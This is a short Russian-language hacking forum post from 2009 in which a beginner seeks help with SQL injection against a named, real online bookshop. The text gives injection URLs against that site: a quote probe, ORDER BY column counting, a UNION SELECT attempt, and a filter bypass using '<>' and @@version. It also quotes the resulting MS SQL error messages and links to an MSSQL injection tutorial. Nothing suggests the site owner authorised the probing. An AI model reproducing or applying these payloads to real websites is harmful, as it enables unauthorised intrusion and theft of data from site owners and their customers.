18.03.2009, 16:32
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
С нами:
10249722
Репутация:
5
|
|
Привет я только начинаю изучать SQL-inj и по этому прошу вас помочь.
http://www.bookstreet.ru/prod_show.php?object_uid=2'
Почему не идёт? Или не стоило мне браться за MS SQL? (в запросах MS SQL не силён вообще)
http://www.bookstreet.ru/prod_show.php?object_uid=2+order+by+2--
если больше 2 - то ошибка
The ORDER BY position number 3 is out of range of the number of items in the select list.
а дальше вот что
'=' - режет
'select' -режет (видно из запроса http://www.bookstreet.ru/prod_show.php?object_uid=2+union+select+1,2'-- )
Unclosed quotation mark before the character string '2 union 1,2\' '.
как видно SELECT в запросе убран
тк = режется использовать можно <>
http://www.bookstreet.ru/prod_show.php?object_uid=2+and+1<>@@version--
а дальше читай тут
http://injection.rulezz.ru/MSSQL-ASP-Injection.html
|
|
|